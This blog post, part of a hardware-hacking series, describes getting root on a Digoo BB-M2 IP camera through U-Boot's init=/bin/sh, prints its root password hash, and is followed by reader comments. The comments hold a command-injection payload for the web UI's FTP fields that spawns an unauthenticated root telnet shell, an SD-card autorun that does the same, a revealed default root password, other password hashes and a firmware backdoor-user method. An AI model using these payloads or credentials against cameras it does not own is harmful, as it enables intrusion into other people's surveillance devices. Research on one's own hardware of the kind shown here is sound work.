Hacking IP-Camera Digoo BB-M2 – Part 3 – Getting root access


After getting access to the serial interface of the IP-Camera the next step is to get a root shell.


By pressing any key during the start-up of the IP-Camera it is possible to get into U-Boot.
Here the bootargs can be extended to bring up a shell with “init=/bin/sh”.
After the adjustment of the boot arguments the Linux operating system should be started with “boot”.

isvp# setenv bootargs 'console=ttyS1,115200n8 mem=39M@0x0 ispmem=5M@0x2700000 rmem=20M@0x2C00000 init/linuxrc rootfstype=squashfs init=/linuxrc rootfstype=squashfs root=/dev/mtdblock2 rw mtdparts=jz_sfc:256k(boot),2176k(kernel),3584k(rootfs),2176k(system) init=/bin/sh'
isvp# boot

After the successful boot up a root shell should be prompted.

/ # whoami
root

With the root shell it is possible to print out the “/etc/passwd” file with the hashed root password.

/ # cat /etc/passwd 
root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh

Structure of the /etc/passwd file
Theoretically it would be possible to compare rainbow tables with the hashed password of the “/etc/passwd”.
But at the moment it did not worked.

  • root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh
  • Name:Password:User-ID:Group-ID:Comment:Directory:Shell
  • Furthermore the available busybox commands could be listed.
    Now the IP-Camera operating system could be analyzed.

    / # busybox 
    BusyBox v1.22.1 (2014-05-13 08:27:59 CST) multi-call binary.
    BusyBox is copyrighted by many authors between 1998-2012.
    Licensed under GPLv2. See source distribution for detailed
    copyright notices.
    
    Usage: busybox [function [arguments]...]
       or: busybox --list[-full]
       or: busybox --install [-s] [DIR]
       or: function [arguments]...
    
            BusyBox is a multi-call binary that combines many common Unix
            utilities into a single executable.  Most people will create a
            link to busybox for each function they wish to use and BusyBox
            will act like whatever it was invoked as.
    
    Currently defined functions:
            [, [[, acpid, add-shell, addgroup, adduser, adjtimex, arp, arping, ash,
            awk, base64, basename, beep, blkid, blockdev, bootchartd, brctl,
            bunzip2, bzcat, bzip2, cal, cat, catv, chat, chattr, chgrp, chmod,
            chown, chpasswd, chpst, chroot, chrt, chvt, cksum, clear, cmp, comm,
            conspy, cp, cpio, crond, crontab, cryptpw, cttyhack, cut, date, dc, dd,
            deallocvt, delgroup, deluser, depmod, devmem, df, dhcprelay, diff,
            dirname, dmesg, dnsd, dnsdomainname, dos2unix, du, dumpkmap,
            dumpleases, echo, ed, egrep, eject, env, envdir, envuidgid, ether-wake,
            expand, expr, fakeidentd, false, fbset, fbsplash, fdflush, fdformat,
            fdisk, fgconsole, fgrep, find, findfs, flock, fold, free, freeramdisk,
            fsck, fsck.minix, fstrim, fsync, ftpd, ftpget, ftpput, fuser, getopt,
            getty, grep, groups, gunzip, gzip, halt, hd, hdparm, head, hexdump,
            hostid, hostname, httpd, hush, hwclock, id, ifconfig, ifdown,
            ifenslave, ifplugd, ifup, inetd, init, insmod, install, ionice, iostat,
            ip, ipaddr, ipcalc, ipcrm, ipcs, iplink, iproute, iprule, iptunnel,
            kbd_mode, kill, killall, killall5, klogd, last, less, linux32, linux64,
            linuxrc, ln, loadfont, loadkmap, logger, login, logname, logread,
            losetup, lpd, lpq, lpr, ls, lsattr, lsmod, lsof, lspci, lsusb, lzcat,
            lzma, lzop, lzopcat, makedevs, makemime, man, md5sum, mdev, mesg,
            microcom, mkdir, mkdosfs, mke2fs, mkfifo, mkfs.ext2, mkfs.minix,
            mkfs.vfat, mknod, mkpasswd, mkswap, mktemp, modinfo, modprobe, more,
            mount, mountpoint, mpstat, mt, mv, nameif, nanddump, nandwrite,
            nbd-client, nc, netstat, nice, nmeter, nohup, nslookup, ntpd, od,
            openvt, passwd, patch, pgrep, pidof, ping, ping6, pipe_progress,
            pivot_root, pkill, pmap, popmaildir, poweroff, powertop, printenv,
            printf, ps, pscan, pstree, pwd, pwdx, raidautorun, rdate, rdev,
            readahead, readlink, readprofile, realpath, reboot, reformime,
            remove-shell, renice, reset, resize, rev, rm, rmdir, rmmod, route, rpm,
            rpm2cpio, rtcwake, run-parts, runlevel, runsv, runsvdir, rx, script,
            scriptreplay, sed, sendmail, seq, setarch, setconsole, setfont,
            setkeycodes, setlogcons, setserial, setsid, setuidgid, sh, sha1sum,
            sha256sum, sha3sum, sha512sum, showkey, slattach, sleep, smemcap,
            softlimit, sort, split, start-stop-daemon, stat, strings, stty, su,
            sulogin, sum, sv, svlogd, swapoff, swapon, switch_root, sync, sysctl,
            syslogd, tac, tail, tar, tcpsvd, tee, telnet, telnetd, test, tftp,
            tftpd, time, timeout, top, touch, tr, traceroute, traceroute6, true,
            tty, ttysize, tunctl, ubiattach, ubidetach, ubimkvol, ubirmvol,
            ubirsvol, ubiupdatevol, udhcpc, udhcpd, udpsvd, umount, uname,
            unexpand, uniq, unix2dos, unlzma, unlzop, unxz, unzip, uptime, users,
            usleep, uudecode, uuencode, vconfig, vi, vlock, volname, wall, watch,
            watchdog, wc, wget, which, who, whoami, whois, xargs, xz, xzcat, yes,
            zcat, zcip
    

    31 Comments on “Hacking IP-Camera Digoo BB-M2 – Part 3 – Getting root access

    1. I’ve tried passwords of length 0 to 5. My computer is not fast enough to try further as it says it will take ~42 days just to try passwords of length 6. Are you getting anywhere with it?

    2. I am running “John the Ripper” on a dual core since about a week. No results at the moment. The system has limited power and reaches 5886p/s 5886c/s 5886C/s with 4 forks. I think the chance to get a hit is pretty low, but i will post the results if it will succeed.

    3. Quick tests and standard logins did not succeed.
      At the moment I am testing with john the ripper incremental mode up to 8 characters.. still about 3 weeks left to complete and no results at this time..

    4. I’m afraid without powerful friends/luck this hash won’t be cracked.
      7/8 lowercase no results either, 9 lower would take a month with my aging GPU already.. mixed is right out.

    5. I’ve tried a wordlist from crackstation.net with John, also without luck.

    6. Well, that’s interesting! Will check this tomorrow. Thank you for pointing to the article!

    7. with telnet access, /system/init/ipcam.sh can be modified for startup scripts, e.g. add “sleep 30 && sh /mnt/startup.sh &” to call a script named startup.sh which resides on the sd card. Helps avoiding boot loops, removing the sd card fixes any fckup. Another goodie, ftp server can be started via “tcpsvd -vE 0.0.0.0 21 ftpd / &”

    8. Trick with ftp script injection works well for temporary root access.
      Hawe the same camera, still trying to bruteforce it, but it’s seem to be more simple to dump firmware and repack it.

    9. If serial root access is possible then there must be a way to change the root password either via passwd or by creating a known one off-line and editing the /etc/passwd file. Unless of course /etc/passwd is not writable. That I do not know. Has anyone looked at the BB-M1?

    10. Guys, why you would like to do things in a most complicated way? To get a root access, follow these steps:

      1) go to website console of your camera with your username and password
      2) go to Alarm Service Settings / Ftp Service Settings
      3) as FTP server put: $(killall telnetd)
      4) as username put: $(telnetd -l /bin/sh)
      5) click Set up button, then click on Test button, in new window you should get error message (that’s ok)
      6) since now you have got root access via telnet, so just run telnet (port 23) to IP of your camera (LAN IP) and… that’s it

      Screenshot here – https://ctrlv.cz/99bU

    11. Hi my friend,

      I have this camera, and from one momment to other it stops working. So i tryed to connect the serial port with success and see that the camera boots automatically.

      I stop the boot process and tryed to erase all memory and send a new firmware…my bad… now the camera doesn’t boot, i think the bootloader is missing…

      Could you help me? Any ideia to send the bootloader/firmware using the SD card, the serial port or any othe way?

      Thanks and regards

    12. I have an Digoo M1Q IP camera, who is like yoosee and others, after upgrade via wifi, that not work anymore, it seems boot loader/firmware is broken; on USB is not recognized.
      Have you any tips or idea how to put again the firmware on it ?
      Thank you !

    13. $1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0 = md5(“ybdHbPDn” + “hslwificam”)

    14. Hi nice work. I would like to as if possible a firmware dump of a working one BB-M2 as mine seems to be corrupted and want to write it back… any help would be appreciated.thanks!

    15. hhrhhr: you are a true hero, thanks!

      and if anybody knows the root password of the BB-M1, please tell us that also.

    16. i have a cam with nearly the same hardware:

      / # cat /etc/passwd
      root:Sm.hequiv6Pwk:0:0::/root:/bin/sh

      it is one of these china cams for 20 euros 😉

    17. This looks very close to the V380E, down to the light sensor at the front. Anyone gotten into the serial line or telnet there?

    18. Update: I have now dumped the flash (8MB!) from the V380E camera. 🙂 I’ll try to extract the filesystem from there, and then walk around in it, perhaps run crack on passwd. Progress!

      How-to: Asserting HOLD# on the flash chip caused the bootloader to crash, so the flash-reader had the SPI bus all to itself after that. Powered via the USB connector, not the flash programmer. (Of course making sure the programmer’s 3v3 wasn’t connected to the chip.)

    19. More update: I just added a ‘toor’ user with my camera’s number as password, and uid 0, and put that squashfs (xz-compressed) back in the original firmware, and flashed it back to the camera. Now I have a shell prompt! Same as when reading the flash – first crash the bootloader with HOLD#, then use the programmer to put your new image into the flash memory. Tadah!

    20. Hello. Thanks for good job. Can you help me discover the root password of my ip bricked camera? I try to modify platform.sh wich i think is broken, but without success.

      More info here: http://forum.videon.spb.ru/viewtopic.php?f=24&t=12493

      This is my serial log:

      console init done

      U-Boot 2012.10 (Feb 24 2016 – 22:33:54) for GK7102 rb sc1045 v2.00 (GOKE)

      HAL: 20151223
      DRAM: 64 MiB
      Flash: 32 MiB
      32 MiB
      NAND: SPINAND MID = 0xff, DID = 0xffff, Data = 0x1ffffff !spinand_board_init[1581]: No support this SPI nand!
      SF: Detected W25Q256FV with page size 256 B, sector size 64 KiB, total size 32 MiB
      In: serial
      Out: serial
      Err: serial
      Net: arm_freq(600MHz)…………..0x112032
      use int MII…………..
      gk7101
      Hit any key to stop autoboot: 0
      [PROCESS_SEPARATORS] run sfboot
      [PROCESS_SEPARATORS] setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=linuxrc ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm
      SF: Detected W25Q256FV with page size 256 B, sector size 64 KiB, total size 32 MiB
      put param to memory
      mem size (41)
      bsb size (2)

      the kernel image is zImage or Image
      entry = 0xc1000000
      ## Transferring control to Linux (at address c1000000)…

      Starting kernel …

      machid = 3988 r2 = 0xc0000100
      Uncompressing Linux… done, booting the kernel.
      [ 0.000000] Booting Linux on physical CPU 0
      [ 0.000000] Linux version 3.4.43-gk (bruce@ubuntu) (gcc version 4.6.1 (crosstool-NG 1.18.0) ) #33 PREEMPT Thu May 19 20:55:21 PDT 2016
      [ 0.000000] CPU: ARMv6-compatible processor [410fb767] revision 7 (ARMv7), cr=00c5387d
      [ 0.000000] CPU: VIPT aliasing data cache, VIPT aliasing instruction cache
      [ 0.000000] Machine: Goke GK7102 RB_SC1045 board V2.00
      [ 0.000000] Memory policy: ECC disabled, Data cache writeback
      [ 0.000000] AHB: 0x90000000 0xf2000000 — 0x1000000
      [ 0.000000] APB: 0xa0000000 0xf3000000 — 0x1000000
      [ 0.000000] PPM: 0xc0000000 0xc0000000 — 0x200000
      [ 0.000000] BSB: 0xc2b00000 0xf5000000 — 0x200000
      [ 0.000000] DSP: 0xc2d00000 0xf6000000 — 0x1300000
      [ 0.000000] hal version = 20151223
      [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 10414
      [ 0.000000] Kernel command line: console=ttySGK0,115200 noinitrd mem=41M rw rootfstype=jffs2 root=/dev/mtdblock3 init=linuxrc
      [ 0.000000] PID hash t)
      [ 0.000000] Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
      [ 0.000000] er: 2, 16384 bytes)
      [ 0.000000] Memory: 41MB = 41MB total
      [ 0.000000] Memory: 36636k/36636k available, 5348k reserved, 0K highmem
      [ 0.000000] Virtual kernel memory layout:
      [ 0.000000] vector : 0xffff0000 – 0xffff1000 ( 4 kB)
      [ 0.000000] fixmap : 0xfff00000 – 0xfffe0000 ( 896 kB)
      [ 0.000000] DMA : 0xff600000 – 0xffe00000 ( 8 MB)
      [ 0.000000] vmalloc : 0x83000000 – 0xff000000 (1984 MB)
      [ 0.000000] lowmem : 0x80000000 – 0x82900000 ( 41 MB)
      [ 0.000000] modules : 0x7f000000 – 0x80000000 ( 16 MB)
      [ 0.000000] .text : 0x80008000 – 0x8044d000 (4372 kB)
      [ 0.000000] .init : 0x8044d000 – 0x8046e000 ( 132 kB)
      [ 0.000000] .data : 0x8046e000 – 0x80497260 ( 165 kB)
      [ 0.000000] .bss : 0x80497284 – 0x804c9888 ( 202 kB)
      [ 0.000000] NR_IRQS:128
      [ 0.000000] >> gk7101 init irq vic1…
      [ 0.000000] >> gk7101 init irq vic2…
      [ 0.000000] gk7101 init vic…
      [ 0.000000] mach gk7101 init timer…
      [ 0.000000] sched_clock: 32 bits at 100 Hz, resolution 10000000ns, wraps every 4294967286ms
      [ 0.000000] Console: colour dummy device 80×30
      [ 0.000000] console [ttySGK0] enabled
      [ 0.010000] Calibrating delay loop… 597.60 BogoMIPS (lpj=2988032)
      [ 0.070000] pid_max: default: 32768 minimum: 301
      [ 0.070000] Mount-cache hash table entries: 512
      [ 0.080000] CPU: Testing write buffer coherency: ok
      [ 0.090000] Setting up static identit[ 0.100000] NET: Registered protocol family 16
      [ 0.110000] gk7101 init timer…
      [ 0.110000] Init HW timer for DSP communication
      [ 0.120000] gk7101 init gpio…
      [ 0.120000] gpiochip_add: registered GPIOs 0 to 63 on device: gk…
      [ 0.130000] create proc dir
      [ 0.130000] gk7101 register devices 9
      [ 0.140000] gk7101 register I2C
      [ 0.290000] bio: create slab at 0
      [ 0.290000] spi spi.0: gk7101 SPI Controller 0 created
      [ 0.300000] spi spi.0: master is unqueued, this is deprecated
      [ 0.300000] usbcore: registered new interface driver usbfs
      [ 0.310000] usbcore: registered new interface driver hub
      [ 0.320000] usbcore: registered new device driver usb
      [ 0.320000] i2c regbase: 0xf3003000
      [ 0.330000] i2c i2c.0: i2c irq:registers 9
      [ 0.330000] i2c i2c.0: GK7101 I2C[0] adapter[i2c-0] probed!
      [ 0.340000] i2c regbase: 0xf3004000
      [ 0.340000] i2c i2c.1: i2c irq:registers 58
      [ 0.350000] i2c i2c.1: GK7101 I2C[1] adapter[i2c-1] probed!
      [ 0.360000] FS-Cache: Loaded
      [ 0.360000] CacheFiles: Loaded
      [ 0.370000] cfg80211: Calling CRDA to update world regulatory domain
      [ 0.380000] gk7101-sd gk7101-sd.0: Slot0 req_size=0x00010000, segs=16, seg_size=0x00010000
      [ 0.410000] gk7101-sd gk7101-sd.0: GK7101 SD/MMC[0] has 1 slo0]
      [ 0.420000] NET: Registered protocol family 2
      [ 0.420000] IP route cache hash table entri[ 0.430000] TCP established hash table entries: 2048 (order: 2, 16384 bytes)
      [ 0.440000] TCP bind hash table entries: 2048 (order: 1, 8192 bytes)
      [ 0.450000] TCP: Hash tables configured (established 2048 bind 2048)
      [ 0.460000] TCP: reno registered
      [ 0.460000] UDP hash table entries: 256 (order: 0, 40able entries: 256 (order: 0, 4096 bytes)
      [ 0.470000] NET: Registered protocol family 1
      [ 0.480000] RPC: Registered named UNIX socket transport module.
      [ 0.490000] RPC: Registered udp transport module.
      [ 0.490000] RPC: Registered tcp transport module.
      [ 0.500000] RPC: Registered tcp NFSv4.1 backchannel transport module.
      [ 0.510000] mdma init…
      [ 0.510000] mdma request irq: 54
      [ 0.520000] NFS: Registering [ 0.530000] jffs2: version 2.2. (NAND) © 2001-2006 Red Hat, Inc.
      [ 0.540000] fuse init (API version 7.18)
      [ 0.540000] msgmni has been set to 71
      [ 0.560000] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 254)
      [ 0.5700 0.570000] io scheduler deadline registered
      [ 0.580000] io scheduler cfq registered (default)
      [ 0.580000] uart.0: ttySGK0 at MMIO 0xa0005000 (irq = 31) is a gk7101uart
      [ 0.590000] uart.1: ttySGK1 at MMIO 0xa001f000 (irq = 15) is a gk7101uart
      [ 0.600000] uart.2: ttySGK2 at MMIO 0xa001e000 (irq = 27) is a gk7101uart
      [ 0.620000] brd: module loaded
      [ 0.630000] loop: module loaded
      [ 0.630000] adc initialized (10:11)
      [ 0.630000] slram: not enough parameters.
      [ 0.640000] speed_mod is 0
      [ 0.640000] gk7101_flash gk7101_flash.0: W25Q256FV (32768 Kbytes)
      [ 0.650000] Creating 5 MTD partitions on “gk7101_flash”:
      [ 0.660000] 0x000000000000-0x000000040000 : “uboot”
      [ 0.660000] 0x000000040000-0x000000050000 : “ubootenv”
      [ 0.670000] 0x000000050000-0x000000200000 : “kernel”
      [ 0.680000] 0x000000200000-0x000001000000 : “rootfs”
      [ 0.690000] 0x000000000000-0x000001000000 : “all”
      [ 0.690000] GKETH_init
      [ 0.700000] [GKETH_drv_probe] eth_base = 0xf200e000
      [ 0.700000] mii id = 0
      [ 0.710000] ###### PHY Reset.1.0.2
      [ 0.790000] mmc0: new high speed SDHC card at address 59b4
      whose id 0x00000000
      [ 0.840000] goke MII Bus: probed
      [ 0.840000] gk7101-eth gk7101-eth.0: MAC Address[02:11:22:a3:a0:00].
      [ 0.850000] usbcore: registered new interface driver cdc_wdm
      [ 0.860000] usbcore: registered new interface driver libusual
      [ 0.860000] musb-hdrc: version 6.0, ?dma?, otg (peripheral+host)
      [ 0.870000] musb phy Begin initial sequence …
      [ 1.120000] gk7101 musb init end…
      [ 1.120000] musb-hdrc musb-hdrc: MUSB HDRC host driveew USB bus registered, assigned bus number 1
      [ 1.140000] vm : ffde0000, phy : c25a0000
      [ 1.140000] dma_buf alloc ok!
      [ 1.140000] hub 1-0:1.0: USB hub found
      [ 1.150000] hub 1-0:1.0: 1 port detected
      [ 1.150000] musb-hdrc musb-hdrc: USB Host mode controller at f0006000 using PIO, IRQ 26
      [ 1.160000] platform add gk7101 musb…
      [ 1.170000] mousedev: PS/2 mouse device common for all mice
      [ 1.170000] input: GKInput as /devices/virtual/input/input0
      [ 1.180000] Protocol NEC[0]
      [ 1.180000] ir request irq: 62
      [ 1.190000] IR Host Controller probed!
      [ 1.190000] i2c /dev entries driver
      [ 1.200000] gk7101_wdt: GK7101 Watchdog Timer, (c) 2014 Goke Microelectronics
      [ 1.200000] [gk7101_wdt_init]: init
      [ 1.210000] [gk7101_wdt_probe]: probe
      [ 1.210000] [gk7101_wdt_probe]: probe mapped wdt_base=f3006000
      [ 1.220000] watchdog inactive, reset disabled, irq disabled
      [ 1.230000] mmcblk0: mmc0:59b4 NCard 14.7 GiB
      [ 1.230000] mmcblk0: p1
      [ 1.240000] IPv4 over IPv4 tunneling driver
      [ 1.240000] gre: GRE over IPv4 demultiplexor driver
      [ 1.250000] ip_gre: GRE over IPv4 tunneling driver
      [ 1.260000] TCP: cubic registetlink socket
      [ 1.270000] NET: Registered protocol family 10
      [ 1.270000] IPv6 over IPv4 tunneling driver
      [ 1.280000] NET: Registered protocol family 17
      [ 1.280000] NET: Registered protocol family 15
      [ 1.290000] lib80211: common routines for IEEE802.11 drivers
      [ 1.300000] Registering the dns_resolver key type
      [ 1.300000] VFP support v0.3: implementor 41 architecture 1 part 20 variant b rev 5
      [ 1.610000] usb 1-1: new high-speed USB device number 2 using musb-hdrc
      [ 9.970000] VFS: Mounted root[ 9.980000] Freeing init memory: 132K
      Starting mdev…
      [ 12.630000] net eth0: ###### GKETH_start_hw
      [ 12.640000] net eth0: ###### GKETH_phy_start_aneg…
      [ 12.650000] ADDRCONF(NETDEV_UP): eth0: link is not ready
      Archive: /mnt/mtd/ipc/ipc_server
      inflating: ipc_server
      [ 13.640000] ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready

      Welcome to HiLinux
      IPCamera login: Archive: /mnt/mtd/ipc/libAPILib.so
      inflating: libAPILib.so
      Archive: /mnt/mtd/ipc/libNetLib.so
      inflating: libNetLib.so
      ipc_server libAPILib.so libNetLib.so sd
      ipc_server libAPILib.so libNetLib.so sd
      start watchdog set 60s timeout
      The timeout was [ 14.480000] watchdog: GK7101 Watchdog: watchdog did not stop!
      is 15 seconds
      The timeout was set to 60 seconds
      [ 15.970000] mt7601Usta: module license ‘unspecified’ taints kernel.
      [ 15.980000] Disabling lock debugging due to kernel taint
      [ 16.080000] rtusb init rtusbSTA —>
      [ 16.090000]
      [ 16.090000]
      [ 16.090000] === pAd = 83182000, size = 899480 ===
      [ 16.090000]
      [ 16.100000] <– RTMPAllocTxRxRingMemory, Status=0
      [ 16.110000] BulkOutEpAddr=0x8
      [ 16.120000] RTMP_COM_IoctlHandle():pAd->BulkOutEpAddr=0x4
      [ 16.120000] RTMP_COM_IoctlHandle():pAd->BulkO 16.130000] RTMP_COM_IoctlHandle():pAd->BulkOutEpAddr=0x6
      [ BulkOutEpAddr=0x7
      [ 16.140000] RTMP_COM_IoctlHandle():pAd->BulkOutEpAddr=0x9
      [ 16.150000] NVM is EFUSE
      [ 16.150000] Endpoint(8) is for In-band Command
      [ 16.160000] Endpoint(4) is for WMM0 AC0
      [ 16.160000] Endpoint(5) is for WMM0 AC1
      [ 16.170000] Endpoint(6) is for WMM0 AC2
      [ 16.170000] Endpoint(7) is for WMM0 AC3
      [ 16.170000] Endpoint(9) is for WMM1 AC0
      [ 16.180000] Endpoint(84) is for Data-In
      [ 16.180000] Endpoint(85) is for Command Rsp
      [ 16.200000] usbcore: registered new interface driver rtusbSTA
      [ 16.230000] encript driver init successful!
      [ 16.250000] gpio driver init successful!
      [ 16.310000] i2c i2c.0: i2c[60]:gk7101_i2c_irq in wrong state[0x9]
      [ 17.310000] i2c i2c.0: I2C state 0x10, please check address 0x20!
      [ 17.310000] i2c i2c.0: i2c[60]:gk7101_i2c_irq in wrong state[0x9]
      [ 18.310000] i2c i2c.0: I2C st[ 18.310000] i2c i2c.0: i2c[60]:gk7101_i2c_irq in wrong state[0x9]
      [ 19.310000] i2c i2c.0: I2C state 0x10, please check address 0x20!
      Fail to send data
      sensor=5get sensor_type= 5
      GC1024
      [ 19.530000] gk_vi_init
      [ 19.530000] request_irq…24 ok– video_sync
      [ 19.530000] request_irq…59 ok– video_frame_last_pixel
      [ 19.550000] request_irq…61 ok– video_frame
      [ 19.550000] gk7101_is_valid_gpio_irq…
      [ 19.620000] crypto initialized (10:11)
      [ 19.910000] jffs2: warning: (112) jffs2_do_read_inode_internal: Truncating ino #252 to 13984 bytes failed because it only had 12288 bytes to start with!
      insmod: can’t insert ‘/mnt/mtd/ipc/modules/tv.ko’: invalid module format
      insert cvbs module failed!
      [ 19.940000] 1. LDO_CTR0(6c) = a64799, PMU_OCLEVEL c
      [ 19.950000] 2. LDO_CTR0(6c) = a6478d, PMU_OCLEVEL 6
      [ 19.970000] FW Version:0.1.00 Build:7640
      [ 19.980000] Build Time:201308222153____
      [ 19.980000] ILM Length = 47000(bytes)
      [ 19.980000] DLM Length = 0(bytes)
      [ 19.990000] Loading FW….
      [ 20.030000] #
      [ 20.040000] RTMP_TimerListAdd: add timer obj 8320c1ac!
      [ 20.040000] RTMP_TimerListAdd: add timer obj 8320c1c4!
      [ 20.050000] RTMP_TimerListAdd: add timer obj 8320c1dc!
      [ 20.060000] RTMP_TimerListAdd: add timer obj 8320c194!
      [ 20.060000] RTMP_TimerListAdd: add timer obj 8320c14c!
      [ 20.070000] RTMP_TimerListAdd: add timer obj 8320c164!
      [ 20.070000] RTMP_TimerListAdd: add timer obj 831a0fe4!
      [ 20.080000] RTMP_TimerListAdd: add timer obj 831841e0!
      [ 20.080000] RTMP_TimerListAdd: add timer obj 831841fc!
      [ 20.090000] RTMP_TimerListAdd: add timer obj 831a103c!
      [ 20.100000] RTMP_TimerListAdd: add timer obj 83186bb4!
      [ 20.100000] RTMP_TimerListAdd: add timer obj 83186264!
      [ 20.110000] RTMP_TimerListAdd: add timer obj 83186b98!
      [ 20.110000] RTMP_TimerListAdd: add timer obj 83186dd8!
      [ 20.120000] RTMP_TimerListAdd: add timer obj 83186bd0!
      [ 20.120000] RTMP_TimerListAdd: add timer obj 83186bec!
      [ 20.130000] RTMP_TimerListAdd: add [ 20.150000] RTMP_TimerListAdd: add timer obj 831a0fb4!
      [ 20.150000] RTMP_TimerListAdd: add timer obj 831a1024!
      [ 20.160000] RTMP_TimerListAdd: add timer obj 83186e08!
      [ 20.160000] RTMP_TimerListAdd: add timer obj 83186e20!
      [ 20.170000] RTMP_TimerListAdd: add timer obj 83186e38!
      [ 20.170000] RTMP_TimerListAdd: add timer obj 83186e50!
      [ 20.210000] cfg_mode=9
      [ 20.210000] wmode_band_equal(): Band Equal!
      [ 20.220000] Key1Str is Invalid key length(0) or Type(0)
      [ 20.220000] Key2Str is Invalid key length(0) or Type(0)
      [ 20.230000] Key3Str is Invalid key length(0) or Type(0)
      [ 20.230000] Key4Str is Invalid key length(0) or Type(0)
      [ 20.240000] 1. Phy Mode = 14
      [ 20.260000] 2. Phy Mode = 14
      [ 20.260000] NVM is Efuse and its size =1d[1e0-1fc]
      [ 20.290000] 3. Phy Mode = 14
      [ 20.290000] AntCfgInit: primary/secondary ant 0/1
      [ 20.500000] —> InitFrequencyCalibration
      [ 20.510000] InitFrequencyCalibrationMode:Unknow mode = 3
      [ 20.510000] InitFrequencyCalibration: frequency offset in the EEPROM = 111(0x6f)
      [ 20.520000] <— InitFrequencyCalibration
      [ 20.530000] RTMPSetPhyMode: channel is out of range, use first channel=1
      [ 20.540000] MCS Set = ff 00 00 00 00
      [ 20.550000] <==== rt28xx_init, Status=0
      [ 20.560000] 0x1300 = 00064300
      [ 20.560000] RTMPDrvOpen(1):Check if PDMA is idle!
      [ 20.580000] RTMPDrvOpen(2):Check if PDMA is idle!
      [ 20.800000] motor driver init successful!
      [ 21.110000] net eth0: ###### GKETH_phy_stop
      [ 21.190000] net eth0: ###### GKETH_start_hw
      [ 21.210000] net eth0: ###### GKETH_phy_start_aneg…
      [ 21.210000] ADDRCONF(NETDEV_UP): eth0: link is not ready
      [ 23.210000] ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
      t error!
      umount: can't forcibly umount /mnt/mtd/ipc/tmpfs/sd: Invalid argument
      killall: gerddns: no process killed
      [ 25.940000] iFlag: 0, iCurStep: 80
      killall: upnp_map: no process killed
      killall: arping: no process killed
      killall: upnp_map: no process killed
      killall: ddns_update: no process killed
      mount success
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      workthread: log init succeed.
      libs_initnettype(Lan): succeed.
      macaddr: 00:E0:F8:33:46:C4
      macflag: 1
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      videocomm(0): 6(6) 1280 720
      videocomm(1): 7(7) 640 352
      TimeZone: -2
      workthread: init ini succeed.
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      workthread: timerreboot init succeed.
      ptz type: motor
      workthread: ptz init succeed.
      HI_Media_SDKInit: efreq=50,resolution=31,maxresolution=6,maxwidth=1280,maxheight=720
      HI_Media_SDKInit: maxchannel=2
      HI_Media_SDKInit: maxresolution[0]=6
      HI_Media_SDKInit: maxresolution[1]=7
      timerreboot: enable=0,reboot time=00:00:00
      rs tempHumidity: get data time out
      rs tempHumidity: get data time out
      GOKE ADI: R(5810[ 38.290000] [fw_ioctl 154] 80047600
      ) LIBC(uClibc) ([ 38.300000] [fw_ioctl 155] 80047600
      gcc version 4.6.[ 38.300000] [fw_ioctl 156] 80 38.310000] [fw_ioctl 157] 00007602
      b 3 00:21:23 PST 2016
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      [ 40.130000] [fw_ioctl 154] 00007602
      [ 40.140000] [fw_ioctl 155] 80047600
      [ 40.140000] [fw_ioctl 156] 80047601
      [ 40.140000] [fw_ioctl 157] 00007602
      [ 40.150000] [fw_ioctl 170] 00007602
      /mnt/mtd/ipc/sd.sh: line 14: ps: not found
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      [ 41.020000] [fw_ioctl 185] 00000000
      vi_open error -17015
      HI_Media_SDKInit: HI_SDK_Init() error!
      HI_Media_Init: init sdk failed!
      HI_Websvr_Init: init media faileipc_server stop: 1970-01-01 02:00:41
      [ 42.280000] iFlag: 1, iCurStep: 255
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      mount success
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      /mnt/mtd/ipc/sd.sh: line 14: ps: not found
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      mount success
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      /mnt/mtd/ipc/sd.sh: line 14: ps: not found
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      /mnt/mtd/ipc/platform.sh: line 14: ps: not found
      mount success

      I tried with this, but not working: :%)

      admin:admin
      root:root
      root:null
      admin:null
      root:cxlinux
      admin:cxlinux
      default:null
      admin:123456
      root:123456
      admin:xmhdipc
      root:xmhdipc

      Код:
      $ mount SD card
      mount: you must be root

      $ mv mnt mnt1
      mv: can't rename 'mnt': Permission denied

      $init isp
      init: must be run as PID 1

      $ reboot
      reboot: Operation not permitted

    21. I have a similar camera based off the same hardware but does not have telnet running by default or many of the other services. But I did find that it monitors the SDcard for a file called “360_autorun.sh”

      if you create a file on the root of the SD called “360_autorun.sh” you can get it to run telnet or any other command, saves connecting a serial cable 😉
      #!/bin/sh
      telnetd -l /bin/sh

    22. 360_autorun.sh dosent work.

      The user on new firmwares its only root (for telnet and OS)
      The password its a sha256 with this hash:

      root:$5$EvgtGUo1zRnZRW$Ge399ZNp3EYQP1NJt7MF1fbYjfnhtloG5m1N2KCp9l0:10933:0:99999:7:::
      bin:*:10933:0:99999:7:::
